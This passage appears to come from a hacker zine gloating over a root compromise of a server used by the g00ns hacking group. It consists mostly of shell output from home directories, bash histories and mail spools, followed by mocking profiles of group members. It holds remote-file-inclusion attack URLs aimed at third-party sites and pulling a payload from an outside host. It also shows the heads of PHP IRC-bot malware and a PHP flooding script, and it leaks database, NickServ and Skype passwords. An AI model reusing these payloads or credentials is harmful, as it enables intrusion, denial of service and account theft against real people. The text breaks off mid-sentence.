g00ns83 g00ns83 10195 Jun 19 2007 showgroups.php --rw-rw-r-- 1 g00ns83 g00ns83 10693 Jun 19 2007 showpost.php --rw-rw-r-- 1 g00ns83 g00ns83 65310 Jun 19 2007 showthread.php -drwxr-xr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 signaturepics --rw-r--r-- 1 g00ns83 root 10026 Dec 16 12:33 snow.zip -drwxr-xr-x 2 g00ns83 g00ns83 4096 Aug 2 2007 spicvbtemp99 --rw-r--r-- 1 g00ns83 g00ns83 2853 Apr 17 00:01 subheader.php --rw-r--r-- 1 g00ns83 g00ns83 10069 Apr 17 00:19 subscribersfeat.php --rw-rw-r-- 1 g00ns83 g00ns83 30709 Jun 19 2007 subscription.php -drwxrwxr-x 3 g00ns83 g00ns83 4096 Aug 2 2007 subscriptions --rw-rw-r-- 1 g00ns83 g00ns83 7904 Sep 7 2005 subscriptions.php --rw-r--r-- 1 g00ns83 g00ns83 61 Jun 10 2006 technews.php --rw-rw-r-- 1 g00ns83 g00ns83 8614 Jun 19 2007 threadrate.php -drwxr-xr-x 2 root root 4096 Mar 9 11:19 tribal -drwxr-xr-x 4 g00ns83 g00ns83 4096 Aug 2 2007 tutorials -drwxr-xr-x 2 g00ns83 g00ns83 4096 Jan 10 13:41 uploads --rw-rw-r-- 1 g00ns83 g00ns83 21967 Jun 19 2007 usercp.php --rw-rw-r-- 1 g00ns83 g00ns83 18798 Jun 19 2007 usernote.php --rw-r--r-- 1 g00ns83 g00ns83 14047 Jun 3 2006 vboutput1.php --rw-r--r-- 1 g00ns83 g00ns83 2 Apr 17 00:18 viewed.txt -drwxr-xr-x 4 g00ns83 g00ns83 4096 Mar 27 16:15 z3r0 -[root@demon2 g00ns83]# cd ../g00nsts395 -[root@demon2 g00nsts395]# ls -al -total 1216 -drwx--x--x 10 g00nsts395 g00nsts395 4096 Apr 16 19:57 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. -drwx------ 2 g00nsts395 g00nsts395 4096 Aug 1 2007 backups --rw------- 1 g00nsts395 g00nsts395 15363 Apr 16 20:43 .bash_history --rw-r--r-- 1 g00nsts395 g00nsts395 304 Jun 3 2006 .bash_logout --rw-r--r-- 1 g00nsts395 g00nsts395 191 Jun 3 2006 .bash_profile --rw-r--r-- 1 g00nsts395 g00nsts395 124 Jun 3 2006 .bashrc -drwx--x--x 3 g00nsts395 g00nsts395 4096 Jun 3 2006 domains -drwx------ 2 g00nsts395 g00nsts395 4096 Sep 20 2006 .elinks --rw-r--r-- 1 g00nsts395 g00nsts395 383 Jun 3 2006 .emacs -drwxrwx--- 3 g00nsts395 g00nsts395 4096 Aug 1 2007 imap -drwx------ 2 g00nsts395 g00nsts395 4096 Aug 1 2007 mail -lrwxrwxrwx 1 g00nsts395 g00nsts395 34 Aug 1 2007 public_html -> ./domains/ts.g00ns.net/public_html --rw-r----- 1 g00nsts395 mail 34 Aug 21 2007 .shadow -drwxr-xr-x 7 g00nsts395 g00nsts395 4096 Apr 16 20:01 ts -drwxrwxr-x 3 g00nsts395 g00nsts395 4096 Dec 24 18:25 ts2afd --rw-rw-r-- 1 g00nsts395 g00nsts395 1155345 Apr 16 19:57 ts2_server_rc2_202319.tar.bz2 -drwxr-xr-x 7 g00nsts395 g00nsts395 4096 Apr 16 19:59 tss2_rc2 -[root@demon2 g00nsts395]# head .bash_history -quit -exit -ls -tar -xjf ts2_server_rc2_20201.tar.bz2 -ls -rm ts2_server_rc2_20201.tar.bz2 -ls -cd tss2_rc2/ -ls -./teamspeak2-server_startscript start -[root@demon2 g00nsts395]# tail .bash_history -cd ts -ls -./teamspeak2-server_startscript stop -rm server.log -./teamspeak2-server_startscript start -cd $home -ls -cd tss2_rc2/ -ls -nano server.log -[root@demon2 g00nsts395]# cd ../pr0be/ -[root@demon2 pr0be]# ls -al -total 44 -drwx--x--x 5 564 565 4096 Mar 9 11:56 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. --rw------- 1 564 565 218 Jan 5 00:12 .bash_history --rw-r--r-- 1 564 565 24 Jan 4 23:06 .bash_logout --rw-r--r-- 1 564 565 176 Jan 4 23:06 .bash_profile --rw-r--r-- 1 564 565 124 Jan 4 23:06 .bashrc -drwx--x--x 3 564 565 4096 Jan 4 23:20 domains -drwxrwx--- 3 564 mail 4096 Jan 4 23:20 imap -drwx------ 2 564 565 4096 Jan 4 23:20 mail -lrwxrwxrwx 1 564 565 31 Jan 4 23:20 public_html -> ./domains/probe.net/public_html --rw-r----- 1 564 mail 34 Jan 4 23:20 .shadow -[root@demon2 pr0be]# cat .bash_history -ls -wget http://irssi.org/files/irssi-0.8.12.tar.gz -w -tar jxfv irssi-0.8.12.tar.gz -tar -xzyf irssi-0.8.12.tar.gz -tar xvfz irssi-0.8.12.tar.gz -ls -cd irssi-0.8.12 -ls -./configure -sudo glib -yum glib -./configure -uname -a -[root@demon2 pr0be]# ls -al public_html/ -total 56 -drwxr-xr-x 3 564 565 4096 Jan 4 23:20 . -drwx--x--x 8 564 565 4096 Jan 5 00:10 .. --rwxr-xr-x 1 564 565 515 May 7 2007 400.shtml --rwxr-xr-x 1 564 565 515 May 7 2007 401.shtml --rwxr-xr-x 1 564 565 515 May 7 2007 403.shtml --rwxr-xr-x 1 564 565 515 May 7 2007 404.shtml --rwxr-xr-x 1 564 565 515 May 7 2007 500.shtml -drwxr-xr-x 2 564 565 4096 Jan 4 23:20 cgi-bin --rw-r--r-- 1 564 565 606 Jan 4 23:20 index.html --rwxr-xr-x 1 564 565 18554 Jun 5 2003 logo.jpg -[root@demon2 pr0be]# cd ../sixtyz -[root@demon2 sixtyz]# ls -al -total 56 -drwx--x--x 7 sixtyz sixtyz 4096 Apr 16 19:09 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. --rw------- 1 sixtyz sixtyz 757 Apr 16 19:09 .bash_history --rw-r--r-- 1 sixtyz sixtyz 24 Mar 22 20:21 .bash_logout --rw-r--r-- 1 sixtyz sixtyz 176 Mar 22 20:21 .bash_profile --rw-r--r-- 1 sixtyz sixtyz 124 Mar 22 20:21 .bashrc -drwx--x--x 3 sixtyz sixtyz 4096 Mar 22 20:27 domains -drwxrwx--- 3 sixtyz mail 4096 Mar 22 20:21 imap -drwxrwxr-x 3 sixtyz sixtyz 4096 Apr 16 17:34 irc -drwx------ 2 sixtyz sixtyz 4096 Apr 2 14:00 mail --rw-rw-r-- 1 sixtyz sixtyz 36 Apr 2 11:45 .mailboxlist -lrwxrwxrwx 1 sixtyz sixtyz 29 Mar 22 20:27 public_html -> ./domains/60z.org/public_html --rw-r----- 1 sixtyz mail 34 Apr 16 17:33 .shadow -drwxr-xr-x 2 root root 4096 Apr 16 17:29 wee -[root@demon2 sixtyz]# cat .bash_history -ls -weechat -weechat-curses -weechat-qt -weechat -h -ls /usr/bin -nano /usr/bin/ddos -ls -ls po -ls intl -ls -./ltmain.sh -cat INSTALL -ls -nano weechat_icon_32.png -l -ls -ls debian -ls -ls /home/sixtyzzz -ls /home/sixtyz -ls -weechat -weechat-gtk -./weechat -w -who -uptime -l -ls -nano ltmain.sh -./weechat-curses -ls -ls po -ls doc -nano doc/weechat-curses.1 -cd $home/.weechat -ls -cd $user -ls -mkdir irc -cd irc -wget http://weechat.flashtux.org/download/weechat-0.2.6.tar.gz -ls -tar -xzf weechat-0.2.6.tar.gz -ls -cd weechat-0.2.6 -ls -./configure -make -ls -nano config.h -ls po -ls intl -ls -./install-sh -ls -nano README -cd /usr -ls -ls bin -ls -ls bin ; grep wee -weechat -ls -cd /home/sixtyz -ls -ls /kerberos -ls wee -ls irc -cd irc -ls -cd weechat-0.2.6 -ls -make -ls src -ls src/irc -ls src/gui -ls -su -su -su -[root@demon2 sixtyz]# ls -al public_html/ -total 688 -drwxr-xr-x 5 sixtyz sixtyz 4096 Apr 14 20:48 . -drwx--x--x 8 sixtyz sixtyz 4096 Mar 23 00:10 .. --rw-r--r-- 1 sixtyz sixtyz 226816 Apr 3 18:51 1202.exe --rw-r--r-- 1 sixtyz sixtyz 160 Apr 13 18:24 1.txt --rwxr-xr-x 1 sixtyz sixtyz 515 May 7 2007 400.shtml --rwxr-xr-x 1 sixtyz sixtyz 515 May 7 2007 401.shtml --rwxr-xr-x 1 sixtyz sixtyz 515 May 7 2007 403.shtml --rwxr-xr-x 1 sixtyz sixtyz 515 May 7 2007 404.shtml --rwxr-xr-x 1 sixtyz sixtyz 515 May 7 2007 500.shtml -drwxr-xr-x 2 sixtyz sixtyz 4096 Mar 22 20:21 cgi-bin --rw-r--r-- 1 sixtyz sixtyz 12218 Apr 13 18:25 har.php -drwxr-xr-x 2 sixtyz sixtyz 4096 Apr 3 13:27 hi --rw-r--r-- 1 sixtyz sixtyz 600 Mar 22 20:21 index.html --rw-r--r-- 1 sixtyz sixtyz 45 Apr 14 20:48 in.txt --rw-r--r-- 1 sixtyz sixtyz 68 Mar 24 17:32 kike.php -drwxrwxrwx 2 sixtyz sixtyz 36864 Apr 3 13:18 kl --rw-r--r-- 1 sixtyz sixtyz 7680 Apr 5 19:23 l.exe --rwxr-xr-x 1 sixtyz sixtyz 18554 Jun 5 2003 logo.jpg --rw-r--r-- 1 sixtyz sixtyz 213504 Apr 2 22:46 lol.exe.exe --rw-r--r-- 1 sixtyz sixtyz 7845 Apr 19 19:36 l.txt --rw-r--r-- 1 sixtyz sixtyz 28444 Apr 13 17:50 rfis_good.txt --rw-r--r-- 1 sixtyz sixtyz 16335 Apr 14 12:38 r.txt --rw-r--r-- 1 sixtyz sixtyz 61440 Apr 7 11:10 s.exe -[root@demon2 sixtyz]# head public_html/rfis_good.txt -http://www.todayandtonight.com/news/admin/inc/change_action.php? - format_menue=http://60z.org/l.txt? -http://www.todayandtonight.com/news/admin/inc/change_action.php? - format_menue=http://60z.org/l.txt? -http://www.xtreme-nails.com/forum/viewtopic.php?p=15&sid=be4c914 - eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]), - exit.%2527&a=http://60z.org/l.txt? -http://www.newfunkradio.com//common/db.php?commonpath=http://60z.org/l.txt? -http://fan.reverielied.net/janime/protection.php?action=logout&siteurl=http://60z.org/l.txt? -http://auklan.net//vwar/convert/mvcw.php?step=1&vwar_root=http://60z.org/l.txt? -http://www.surfarticles.com//index.php?page=http://60z.org/l.txt? -http://articles2post.com//index.php?page=http://60z.org/l.txt? -http://malkaratuning.com//language/lang_german/lang_main_album.php? - phpbb_root_path=http://60z.org/l.txt? -http://construccioneszaru.com//?mosConfig_absolute_path=http://60z.org/l.txt? -[root@demon2 sixtyz]# head public_html/l.txt -<?php -set_time_limit(0); -error_reporting(0); -echo "Inserted <b>successfully</b><br>\n"; -$country = file_get_contents('http://api.hostip.info/country.php'); -class irc_bot { - var $config = array("server" => "irc.evilcoders.net", - "port" => "6667", - "chan" => "#fbilol", - "key" => "lol", -[root@demon2 sixtyz]# head public_html/r.txt -<?php -set_time_limit(0); -error_reporting(0); -echo "Inserted <b>successfully</b><br>\n"; -class gBot -{ - var $config = array("server"=>"irc.evilcoders.net", - "port"=>6667, - "pass"=>"", - "prefix"=>"[XX]|", -[root@demon2 sixtyz]# head public_html/1.txt -<?php - for($i=0;$i<($_GET['length']*100);++$i)$sock=@fsockopen(( -$_GET['prot'] == "udp" ? "udp://" : "").$_GET['ip'], $_GET['port'], $errno, $errstr, 0.0001); -?>[root@demon2 sixtyz]# -[root@demon2 sixtyz]# cd ../sn00g3s -[root@demon2 sn00g3s]# ls -al -total 72 -drwx--x--x 10 sn00g3s sn00g3s 4096 Apr 3 01:33 . -drwx--x--x 50 root root 4096 Mar 27 16:19 .. -drwx------ 2 sn00g3s sn00g3s 4096 Aug 1 2007 backups --rw------- 1 sn00g3s sn00g3s 3822 Dec 30 12:44 .bash_history --rw-r--r-- 1 sn00g3s sn00g3s 304 Jun 8 2006 .bash_logout --rw-r--r-- 1 sn00g3s sn00g3s 191 Jun 8 2006 .bash_profile --rw-r--r-- 1 sn00g3s sn00g3s 124 Jun 8 2006 .bashrc --rw------- 1 sn00g3s sn00g3s 0 Aug 18 2007 .clipboard.txt -drwx--x--x 3 sn00g3s sn00g3s 4096 Jun 8 2006 domains -drwx------ 2 sn00g3s sn00g3s 4096 Mar 20 2007 .elinks --rw-r--r-- 1 sn00g3s sn00g3s 383 Jun 8 2006 .emacs -drwxrwx--- 3 sn00g3s sn00g3s 4096 Aug 1 2007 imap -drwx------ 2 sn00g3s sn00g3s 4096 Mar 21 16:24 mail --rw-rw-r-- 1 sn00g3s sn00g3s 36 Dec 16 16:34 .mailboxlist -lrwxrwxrwx 1 sn00g3s sn00g3s 31 Aug 1 2007 public_html -> ./domains/g00ns.net/public_html -drwx------ 18 sn00g3s sn00g3s 4096 Jul 8 2007 pubold --rw-r----- 1 sn00g3s mail 34 Dec 16 16:31 .shadow -drwx------ 2 sn00g3s sn00g3s 4096 May 22 2007 .ssh -drwxr-xr-x 3 sn00g3s sn00g3s 4096 Aug 25 2007 webmail -[root@demon2 sn00g3s]# ls -al .ssh/ -total 12 -drwx------ 2 sn00g3s sn00g3s 4096 May 22 2007 . -drwx--x--x 10 sn00g3s sn00g3s 4096 Apr 3 01:33 .. --rw-r--r-- 1 sn00g3s sn00g3s 224 May 22 2007 known_hosts -[root@demon2 sn00g3s]# cat .ssh/* -209.200.50.124 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAvMKDvuIjkr3pTrFe7S4M83WnL -sGkTn7rUcLm/l+PIrrjvWFh2Q0uFAlxD78spDpEtz/1A9ANS8MBUXrD0nSRC51iSVrOfNTOsmiay -3Ik1fxUIHshwqRUO8OmZt4pENPl9HNIsmFjLThyBNVEm9VA5m6fclTW6s1QW6+47WZZrEk= -[root@demon2 sn00g3s]# cd public_html/ -[root@demon2 public_html]# ls -al -total 208672 -drwx--x--x 28 sn00g3s sn00g3s 4096 Apr 3 01:40 . -drwx--x--x 8 sn00g3s sn00g3s 4096 Aug 28 2007 .. --rw-r--r-- 1 sn00g3s sn00g3s 10 Jul 22 2007 403.shtml --rw-r--r-- 1 sn00g3s sn00g3s 9 Jul 22 2007 404.shtml --rw-r--r-- 1 sn00g3s sn00g3s 4283 Dec 15 12:35 about.php -d--------- 2 sn00g3s sn00g3s 4096 Sep 21 2006 admin --rw-r--r-- 1 sn00g3s sn00g3s 169072 Aug 6 2007 around.png -d--------- 2 sn00g3s sn00g3s 4096 Sep 21 2006 author ----------- 1 sn00g3s sn00g3s 2746 Sep 21 2006 author.php -d--------- 2 sn00g3s sn00g3s 4096 Sep 21 2006 authors --rw-r--r-- 1 sn00g3s sn00g3s 6913 Jul 22 2007 auto.tar.gz --rw-r--r-- 1 sn00g3s sn00g3s 2956 Aug 6 2007 backcontent.png --rw-r--r-- 1 sn00g3s sn00g3s 97 Aug 6 2007 back.png -drwxr-xr-x 2 sn00g3s sn00g3s 4096 Sep 21 2006 cgi-bin --rw-r--r-- 1 sn00g3s sn00g3s 8557 Jul 8 2007 config.php --rw-r--r-- 1 sn00g3s sn00g3s 14901 Aug 6 2007 countdown.swf --rw-r--r-- 1 sn00g3s sn00g3s 19264 Jul 31 2007 csf.conf -drwxr-xr-x 2 sn00g3s sn00g3s 4096 Sep 21 2006 css --rw-r--r-- 1 sn00g3s sn00g3s 1461 Sep 21 2006 fade.js --rw-r--r-- 1 sn00g3s root 6726 Jan 26 19:01 fagime --rw-r--r-- 1 sn00g3s sn00g3s 5169 Aug 11 2007 faqbackup.php --rw-r--r-- 1 sn00g3s sn00g3s 1150 Oct 3 2006 favicon.ico -drwxr-xr-x 7 sn00g3s sn00g3s 4096 Sep 21 2006 feeds --rw-r--r-- 1 sn00g3s sn00g3s 20 Nov 5 2006 fm902i0342gk340ok-43l.php --rw-r--r-- 1 sn00g3s sn00g3s 3316 Sep 21 2006 forum.php --rw-r--r-- 1 sn00g3s sn00g3s 76244 Aug 16 2007 g00ns.png --rw-r--r-- 1 sn00g3s sn00g3s 65208 Dec 1 21:39 ggdg9.jpg -drwxr-xr-x 3 sn00g3s root 4096 Dec 30 15:40 hal --rw-r--r-- 1 sn00g3s sn00g3s 2959 Sep 21 2006 hallbkp.php --rw-r--r-- 1 sn00g3s sn00g3s 696 Sep 21 2006 hall_def.php --rw-r--r-- 1 sn00g3s sn00g3s 2911 Aug 8 2007 hall.php --rw-r--r-- 1 sn00g3s sn00g3s 252038 Sep 21 2006 header750x1001.jpg --rw-r--r-- 1 sn00g3s sn00g3s 1828 Sep 21 2006 headlinebox.html --rw-r--r-- 1 sn00g3s sn00g3s 529 Feb 21 22:28 .htaccess -drwxr-xr-x 3 sn00g3s root 4096 Dec 6 2003 image -drwxr-xr-x 3 sn00g3s sn00g3s 4096 Aug 18 2007 images -drwxrwxrwx 7 sn00g3s sn00g3s 4096 Jun 19 2007 includes --rw-r--r-- 1 sn00g3s sn00g3s 9001 Dec 13 2006 index1.php --rw-rw-r-- 1 sn00g3s sn00g3s 8885 Jul 8 2007 index.2.php --rw-r--r-- 1 sn00g3s root 6948 Dec 16 11:29 index.bak2 --rw-r--r-- 1 sn00g3s sn00g3s 8290 Jul 29 2007 indexbkp.php --rw-r--r-- 1 sn00g3s sn00g3s 42 Jul 17 2007 indexold --rw-r--r-- 1 sn00g3s sn00g3s 42 Jul 17 2007 index.old --rw-r--r-- 1 sn00g3s sn00g3s 7112 Feb 5 13:27 index.php --rw-r--r-- 1 sn00g3s sn00g3s 7927 Aug 11 2007 indexwj.php --rw-r--r-- 1 sn00g3s root 22 Dec 17 23:15 info.php --rw-r--r-- 1 sn00g3s sn00g3s 2109 Apr 3 01:39 irccheck2.php --rw-r--r-- 1 sn00g3s sn00g3s 550 Apr 21 13:24 irccheck.txt --rw-r--r-- 1 sn00g3s sn00g3s 4431 Apr 3 01:39 irc.php -drwxr-xr-x 2 sn00g3s sn00g3s 4096 Sep 21 2006 js -drwxr-xr-x 2 sn00g3s sn00g3s 4096 Mar 31 21:03 kat --rw-r--r-- 1 sn00g3s root 256 Oct 19 2007 lic_req.bin --rw-r--r-- 1 sn00g3s sn00g3s 57368852 Jul 19 2007 linux-grsec-2.6.21.3.tar.gz --rw-r--r-- 1 sn00g3s root 104042878 Aug 13 2007 linux.tar.gz -drwxr-xr-x 3 sn00g3s sn00g3s 4096 Feb 21 22:12 live --rwxrwxrwx 1 sn00g3s sn00g3s 1 Mar 31 19:01 lollevel.txt --rw-r--r-- 1 sn00g3s sn00g3s 623 Jun 24 2007 members.php --rw-r--r-- 1 sn00g3s root 0 Dec 17 23:14 nano --rw-r--r-- 1 sn00g3s sn00g3s 4402 Apr 1 02:07 offline.png -drwxr-xr-x 2 sn00g3s sn00g3s 4096 Jul 17 2007 oldfiles_july18 --rw-r--r-- 1 sn00g3s sn00g3s 4458 Apr 1 02:07 online.png --rw-r--r-- 1 sn00g3s sn00g3s 1609 Aug 12 2007 pics.php --rw-r--r-- 1 sn00g3s sn00g3s 3041 Sep 21 2006 radio.php --rw-r--r-- 1 sn00g3s sn00g3s 148 Aug 11 2007 read.php --rw-r--r-- 1 sn00g3s sn00g3s 1886 Sep 21 2006 rss.html --rw-r--r-- 1 sn00g3s sn00g3s 1715 Aug 11 2007 rss.php --rw-r--r-- 1 sn00g3s sn00g3s 259 Sep 21 2006 sb_javascript.js -drwxr-xr-x 2 sn00g3s root 4096 Dec 6 2003 script --rw-r--r-- 1 sn00g3s root 41162814 Feb 9 20:12 sc_serv.log ----------- 1 sn00g3s sn00g3s 615 Jul 18 2007 secnews.php --rw-r--r-- 1 sn00g3s sn00g3s 17544 Aug 6 2007 selector.swf -drwxr-xr-x 2 sn00g3s sn00g3s 4096 Oct 1 2006 shout -drwxr-xr-x 2 sn00g3s sn00g3s 4096 Sep 21 2006 shout1 -drwxr-xr-x 3 sn00g3s sn00g3s 4096 Sep 21 2006 shoutcast ----------- 1 sn00g3s sn00g3s 6492 Jun 24 2007 site_members.php -d--------- 3 sn00g3s sn00g3s 4096 Mar 21 16:26 sn00gadminkthnx99 --rwxr-xr-x 1 sn00g3s sn00g3s 59 Jul 8 2007 sn00gnews.php --rw-r--r-- 1 sn00g3s root 10026 Dec 16 12:33 snow.zip -drwxr-xr-x 2 sn00g3s sn00g3s 4096 Aug 7 2007 spicvbtemp99 --rw-r--r-- 1 sn00g3s sn00g3s 3193 Aug 11 2007 stereo.php -drwxr-xr-x 3 sn00g3s sn00g3s 4096 Feb 21 22:06 stream --rw-r--r-- 1 sn00g3s sn00g3s 5390 Dec 15 12:47 style.css --rw-r--r-- 1 sn00g3s sn00g3s 1599 Sep 21 2006 tablebkp.php --rw-r--r-- 1 sn00g3s sn00g3s 1581 Aug 7 2007 table.php -drwxr-xr-x 3 sn00g3s sn00g3s 4096 Aug 18 2007 tag --rw-r--r-- 1 sn00g3s sn00g3s 14837 Aug 11 2007 tag.php -drwxr-xr-x 2 sn00g3s sn00g3s 4096 Jun 24 2007 teamspeakdisplay --rw-r--r-- 1 sn00g3s sn00g3s 616 Jul 18 2007 technews.php --rw-rw-r-- 1 sn00g3s sn00g3s 954 Aug 4 2007 template.tar.gz -drwxr-xr-x 3 sn00g3s root 4096 Dec 16 11:24 themes --rw-r--r-- 1 sn00g3s sn00g3s 2848 Aug 6 2007 title.png -drwxr-xr-x 4 sn00g3s sn00g3s 4096 Feb 8 13:43 tribal -drwxr-xr-x 3 sn00g3s sn00g3s 4096 Sep 21 2006 ts --rw-r--r-- 1 sn00g3s sn00g3s 3682 Aug 11 2007 ts.php --rw-r--r-- 1 sn00g3s root 12033 Jan 6 17:30 udpips --rw-r--r-- 1 sn00g3s sn00g3s 14047 Jul 8 2007 vboutput1.php --rw-r--r-- 1 sn00g3s root 9750649 Oct 6 2007 ZendOptimizer-3.3.0-linux-glibc21-i386.tar.gz -[root@demon2 public_html]# cat /home/sn00g3s/domains/g00ns.net/public_html/includes/config.php - -( crap may be removed ) - -<?php -/*======================================================================*\ -|| #################################################################### || -|| # vBulletin 3.6.4 - Licence Number VBFD1673E2 -|| # ---------------------------------------------------------------- # || -|| # All PHP code in this file is ©²000-2007 Jelsoft Enterprises Ltd. # || -|| # This file may not be redistributed in whole or significant part. # || -|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || -|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || -|| #################################################################### || -\*======================================================================*/ - -$config['Database']['dbtype'] = 'mysql'; - -$config['Database']['dbname'] = 'g00ns83_forum'; - -$config['Database']['tableprefix'] = 'vb3g'; - -$config['Database']['technicalemail'] = 'admin@g00ns.net'; - -$config['Database']['force_sql_mode'] = false; - -$config['MasterServer']['servername'] = 'localhost'; -$config['MasterServer']['port'] = 3306; - -$config['MasterServer']['username'] = 'g00ns83_user'; -$config['MasterServer']['password'] = 'gotohell09666'; - -$config['MasterServer']['usepconnect'] = 0; - - -$config['SlaveServer']['servername'] = ''; -$config['SlaveServer']['port'] = 3306; -$config['SlaveServer']['username'] = ''; -$config['SlaveServer']['password'] = ''; -$config['SlaveServer']['usepconnect'] = 0; - -$config['Misc']['admincpdir'] = 'admin1cp'; -$config['Misc']['modcpdir'] = 'mod1cp'; - -$config['Misc']['cookieprefix'] = 'bb'; - -$config['Misc']['forumpath'] = ''; - -$config['SpecialUsers']['canviewadminlog'] = '1'; - -$config['SpecialUsers']['canpruneadminlog'] = '1'; - -$config['SpecialUsers']['canrunqueries'] = '1'; - -$config['SpecialUsers']['undeletableusers'] = '1'; - -$config['SpecialUsers']['superadministrators'] = '1'; - - -$config['Mysqli']['ini_file'] = ''; - -$config['Misc']['maxwidth'] = 2592; -$config['Misc']['maxheight'] = 1944; - -[root@demon2 public_html]# cat /home/sn00g3s/domains/g00ns.net/public_html/config.php -<?php -/*======================================================================*\ -|| #################################################################### || -|| # vBulletin 3.6.4 - Licence Number VBFD1673E2 -|| # ---------------------------------------------------------------- # || -|| # All PHP code in this file is ©²000-2007 Jelsoft Enterprises Ltd. # || -|| # This file may not be redistributed in whole or significant part. # || -|| # ---------------- VBULLETIN IS NOT FREE SOFTWARE ---------------- # || -|| # http://www.vbulletin.com | http://www.vbulletin.com/license.html # || -|| #################################################################### || -\*======================================================================*/ - -$config['Database']['dbtype'] = 'mysql'; - -$config['Database']['dbname'] = 'g00ns83_forum'; - -$config['Database']['tableprefix'] = 'vb3g'; - -$config['Database']['technicalemail'] = 'admin@g00ns.net'; - -$config['Database']['force_sql_mode'] = false; - - -$config['MasterServer']['servername'] = 'g00ns-forum.net'; -$config['MasterServer']['port'] = 3306; - -$config['MasterServer']['username'] = 'g00ns83_user'; -$config['MasterServer']['password'] = 'sm00chy'; - -$config['MasterServer']['usepconnect'] = 0; - -$config['SlaveServer']['servername'] = ''; -$config['SlaveServer']['port'] = 3306; -$config['SlaveServer']['username'] = ''; -$config['SlaveServer']['password'] = ''; -$config['SlaveServer']['usepconnect'] = 0; - -$config['Misc']['admincpdir'] = 'admin1cp'; -$config['Misc']['modcpdir'] = 'mod1cp'; - -$config['Misc']['cookieprefix'] = 'bb'; - -$config['Misc']['forumpath'] = ''; - -$config['SpecialUsers']['canviewadminlog'] = '1'; - -$config['SpecialUsers']['canpruneadminlog'] = '1'; - -$config['SpecialUsers']['canrunqueries'] = '1'; - -$config['SpecialUsers']['undeletableusers'] = '1'; - -$config['SpecialUsers']['superadministrators'] = '1'; - -$config['Mysqli']['ini_file'] = ''; - -$config['Misc']['maxwidth'] = 2592; -$config['Misc']['maxheight'] = 1944; - -[root@demon2 public_html]# cat /home/admin/domains/rst-crew.net/public_html/forum/config.php -<?php -error_reporting(0); -$dbms = 'mysql'; -$dbhost = 'localhost'; -$dbname = 'rosec_i376joo'; -$dbuser = 'rosec_i376joo'; -$dbpasswd = 'xBQZgypDSe1l0'; -$table_prefix = 'phpbb_'; -define('PHPBB_INSTALLED', true); -?> -[root@demon2 public_html]# cd /var/spool/mail -[root@demon2 mail]# ls -al -total 75300 -drwxrwxr-x 2 root mail 4096 Apr 21 14:55 . -drwxr-xr-x 11 root root 4096 Jul 31 2007 .. --rw-rw---- 1 admin admin 314211 Sep 19 2007 admin --rw-rw---- 1 alliancedn alliancedn 0 Apr 27 2006 alliancedn --rw-rw---- 1 aosw aosw 1013473 Oct 18 2007 aosw --rw-rw---- 1 apache mail 4736 Aug 22 2007 apache --rw-rw---- 1 barnseo barnseo 1987728 Apr 21 09:59 barnseo --rw-rw---- 1 bored bored 3487 Jul 18 2007 bored --rw-rw---- 1 churc0 churc0 0 Jun 24 2006 churc0 --rw-rw---- 1 connors connors 17044 Apr 7 11:33 connors --rw-rw---- 1 diradmin mail 69254 Mar 26 19:13 diradmin --rw-rw---- 1 egg mail 19916 Apr 14 23:10 egg --rw-rw---- 1 every every 3317388 Apr 21 14:38 every --rw-rw---- 1 evilcode evilcode 0 Apr 29 2006 evilcode --rw-rw---- 1 excodeirc excodeirc 0 Apr 28 2006 excodeirc --rw-rw---- 1 exploiterc exploiterc 0 Apr 27 2006 exploiterc --rw-rw---- 1 felosii felosii 0 Jun 30 2007 felosii --rw-rw---- 1 g00ns83 mail 9074189 Apr 21 14:49 g00ns83 --rw-rw---- 1 g00nsts395 g00nsts395 0 Jun 3 2006 g00nsts395 --rw-rw---- 1 grumpy grumpy 284648 Mar 1 10:51 grumpy --rw-rw---- 1 hthhost mail 118701 Apr 12 15:26 hthhost --rw-rw---- 1 illmob illmob 0 Apr 28 2006 illmob --rw-rw---- 1 lost mail 8398 Mar 27 07:48 lost --rw-rw---- 1 mail mail 1038 Aug 30 2007 mail --rw-rw---- 1 party party 182080 Feb 13 07:40 party --rw-rw---- 1 pingyill pingyill 60510303 Apr 21 14:55 pingyill --rw-rw---- 1 rageserver rageserver 0 Apr 28 2006 rageserver --rw-rw---- 1 robo robo 554 Jun 1 2007 robo --rw------- 1 root root 1765 Feb 10 14:01 root --rw-rw---- 1 sixtyz mail 4701 Apr 14 08:08 sixtyz --rw-rw---- 1 sn00g3s sn00g3s 0 Jun 8 2006 sn00g3s --rw-rw---- 1 void void 0 Jan 18 2007 void - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -In any large hacking community there are two kinds of people at the top. - -The first is not going anywhere. They are either unskilled (even for that -level) and lucky to be there (probably there through patronage), or they are -just happy with the benefits from being at the top of that level. - -The second group is smaller, and contains a couple of people who have the -talent, willingness to learn, dedication and time to move forward. There are -a couple of those at g00ns, and we wish them good luck. Don't settle for being - at the top of an organization that sells positions on a forum, whose -competitors are The Defaced and The Regime. But you can't just look for the - next cool hacker website, you dig? Try to find smarter people, and they -will not always advertise. - - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -It's not over yet kids! Time for profiles! - -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - - -// z3r0 // - - -z3r0 -> nickserv: identify r3xleoP3@Dm3s!!!#&6^ - -g00ns #private password and skype password: ismokedyoustupid - -z3r0 on zf03: What exactly is Zf0 3? it looks like a article about how Zf0 - just goes around owning people. -z3r0 on zf03: HAH the irc logs are a comedy goldmine. - --19:48:59- (z3r0) we will have to introduce you to illwill --19:49:03- (z3r0) hes our asm guru - --20:02:29- (z3r0) most kiddies cant even run a perl script - --20:08:55- (z3r0) basically our credo is we hate neophytes - --20:16:22- ~ (Psyop) Do you read many zines? --20:16:27- (z3r0) sometimes --20:16:28- (z3r0) depends --20:16:39- (z3r0) i read zf0's - -Always good to have fans. - - -// clorox // - - -clorox -> nickserv: identify loldongs - -"I'm planning on doing some 